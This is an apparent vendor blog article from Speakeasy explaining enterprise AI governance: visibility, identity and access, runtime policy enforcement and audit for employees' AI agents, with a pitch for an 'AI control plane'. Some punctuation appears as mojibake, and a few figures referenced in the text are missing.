AI governance
How an organization controls what its AI tools are allowed to see, do, and decide on its behalf. Itโs the layer that decides which employees can use which AI agents, what data those agents can reach, what actions they can take, and how all of that gets observed, logged, and audited.
AI governance is one of the top concerns inside the enterprise. AI usage has exploded, moving faster than companiesโ abilities to govern it. Claude, ChatGPT, Cursor, Copilot, and a dozen tools nobody approved are being used in production work. Many of them can read Google Drive, query internal databases, and act inside Salesforce. Most of the organizations deploying them have no consistent way to say which employees are using which tools, against which data, or under whose authority. Closing that gap, without killing the adoption the board is asking executives to drive, is the goal of AI governance.
A note on terminology
AI governance has historically referred to the discipline of governing model training: bias mitigation, fairness audits, ethics review boards, and the regulatory compliance that comes with building foundation models. Frameworks like the NIST AI Risk Management Framework and ISO/IEC 42001 sit largely in this tradition, and IBMโs overview of AI governance is a good summary of that framing. That work remains real for the organizations training models. This piece is about the version of governance most enterprises actually face today: how to control the AI tools their employees are already using.
The rest of this piece walks through the version of AI governance that matters in 2026: what its four core building blocks are, why the category has become urgent, and how leading organizations are assembling those blocks into a single architecture, the AI control plane, that lets them roll AI out without sacrificing the companyโs governance controls.
The building blocks of AI governance
When you look at what organizations are putting in place, and the tooling categories emerging to serve them, four functions show up repeatedly. Together they describe the working surface of AI governance.
AI governance
rollout has to answer for.
Visibility
You canโt govern what you canโt see. The first job is a continuous, accurate inventory of every AI tool, agent, and connection in use across the company. That includes the sanctioned tools, the bottoms-up adoptions from individual teams, the personal accounts employees connected to enterprise data, and the MCP servers and agents proliferating below the level of a procurement cycle. Most enterprises that run an honest audit discover dozens of tools they didnโt know existed, a problem now widely referred to as shadow AI.
Identity and access
AI agents act in one of two modes. Sometimes they act on behalf of a specific person, like a developer running Cursor or a financial analyst using Claude CoWork. Other times they act autonomously, like OpenClaw, running as background workers and scheduled jobs that execute without a human in the loop. In either mode, an agent will by default use whatever credentials and access it can reach to accomplish the task itโs been given. That default is what makes identity and access the load-bearing layer of governance. The question for every action is whether the identity behind it is explicit or implicit.
Explicit means the agent inherits a specific userโs identity through SSO when one is present, or carries its own scoped service identity when operating autonomously. That identity holds a permission set scoped by team, role and purpose. Implicit means the agent has not had access granted intentionally, but has instead inherited access based on what tools itโs able to discover and use.
Policy and security
Access decides whoโs allowed to call. Policy decides whatโs allowed to flow through the call. Access is content-blind: it evaluates the envelope (who is calling, what resource, what verb) and stops there. Policy is content-aware: it inspects the actual prompt, response, and tool-call arguments at runtime, and catches the abuses access structurally cannot see. An agent can hold legitimate write access to an email tool and still need to be blocked from sending customer records to an attacker, because the abuse lives in the payload, not the envelope.
For that inspection to function as a real control rather than a documented intention, it has to be executable. A rule that says โAI tools should not access customer PII outside the EUโ is not a control if it lives in a Confluence page and gets enforced through training. Itโs a control when the inspection layer evaluates every prompt, response, and tool call against it and blocks the ones that violate it. The threats itโs inspecting for include data exfiltration, prompt injection, over-broad tool calls, and access to systems an agent shouldnโt be touching. The primitive that makes this enforcement possible at the agent itself is the agent hook, a lifecycle handler that fires on every prompt and tool call. Real-time inspection with active blocking is the bar.
Observability and audit
Governance has to produce evidence: every AI interaction, every tool call, every decision, captured in a form that can be reviewed against a policy and exported into the SIEM and warehouse the security and compliance teams already use. Observability is also where the political dimension of AI governance plays out. Leadership wants to know whether the AI investment is working, and observability is what produces the answer.
These four functions, visibility, identity and access, policy and security, observability and audit, are what enterprise AI governance is trying to do. Notice what isnโt on the list: training data review, model fairness audits, ethics committees. Those things still matter to the small number of organizations that build the models. They arenโt the governance levers available to the organizations consuming them.
Why AI governance is critical now
Three forces are pushing the redefinition into the open.
-
Inside enterprises, the pressure to become AI-native is coming from both directions at once. From the top down, boards and CEOs are mandating AI adoption as a strategic priority and measuring executives on it. From the bottom up, employees are reaching for Claude, ChatGPT, Cursor, and Copilot to do their day jobs whether or not procurement has signed off. The result is that AI is no longer a pilot, itโs embedded in daily workflow for engineering, sales, finance, legal, and operations. The governance question stopped being theoretical because the usage stopped being theoretical.
-
The protocols connecting AI to enterprise systems, Model Context Protocol most prominently, have made the access layer concrete. AI agents have gone from answering questions, to implementing answers. AI can call tools, query databases, post to Slack, modify records in Salesforce. The interface between AI and the rest of the business now has a name and a shape, which means it can be governed at that interface. A year ago, governance was an abstraction. Today itโs a gateway. Weโve written more about that surface in our piece on MCP governance.
-
The risk of doing nothing is no longer hypothetical. The PocketOS case is illustrative: a lack of AI controls let an agent drop the companyโs production database, taking millions in revenue with it. That is the headline-grade version of a failure mode that is now showing up in less visible ways across the enterprise, alongside data leaks through consumer AI tools, active prompt injection attacks on agent systems, and rising regulatory pressure under the EU AI Act. The conversation in the C-suite has moved from โwhat if something happensโ to โwhat are we doing about the things already happening.โ
Put together, these forces are putting pressure on executive teams across the board: CTO, CIO, CISO, or newly minted Chief AI Officer who are tasked with delivering the AI transformation.
A maturity model for AI governance
Most enterprises donโt move from โno AI governanceโ to โfully governedโ in a single quarter. The arc usually runs through four stages, and itโs useful to know where you are.
The progression matters because itโs how budget and capability accumulate. Stage 1 is the default. Stage 4 is the operating state most boards are expecting within twelve to eighteen months.
The solution: the AI control plane
The architecture for doing this is what we and others have begun calling the AI control plane. The name borrows from networking, where Kubernetes, service meshes, and Cloudflare have control planes for the same reason: a system that governs the rest of a system needs a name.
An AI control plane is the governing layer between every AI agent in an organization and every system those agents are allowed to reach. It unifies connection, identity, policy enforcement, and observability so that every prompt, response, and tool call flows through a single controlled path. Visibility, identity, policy, and observability stop being four separate initiatives bought from four different vendors and become four properties of the same architectural layer.
The reason that integration matters, and the reason point tools fall short on their own, is that each component sees only part of the interaction. The structural problem looks like this:
Each is necessary. None is sufficient. The control plane is what you get when these layers are designed to see each other.
The other reason the framing matters is that it dissolves the false choice most enterprises think theyโre making. Companies that respond to AI by locking everything down kill adoption. Companies that donโt lock anything down get incidents. Treated as separate problems run by separate teams, governance and enablement are in permanent tension. Treated as a single architecture, they stop being. The thing that rolls AI out is the thing that keeps it safe.
Weโve written a longer reference architecture for the AI control plane here, including the components, the vendor landscape, and what a mature deployment looks like. The short version is that this is the shape of the answer to the governance question most enterprises are actually asking when they search for it.
What to do with this
If youโre an executive who landed on this page from a search for โAI governance,โ and what youโre really trying to figure out is how to roll AI out across your organization without losing control of it, the most useful next step isnโt picking a product. Itโs drawing the architecture: where AI lives in your stack today, what data it touches, whoโs using it, and which of the four functions above you can answer for and which you canโt.
Speakeasy is building the AI control plane. We started with the managing MCP access, because connecting AI to data is particularly dangerous, and weโve been extending across the four functions since. If youโre wrestling with this, weโd be glad to talk.
AI governance, properly understood, isnโt a question of whether your model is fair. Itโs a question of whether the AI in your organization is connected, controlled, secured, and observed, and whether you can prove it.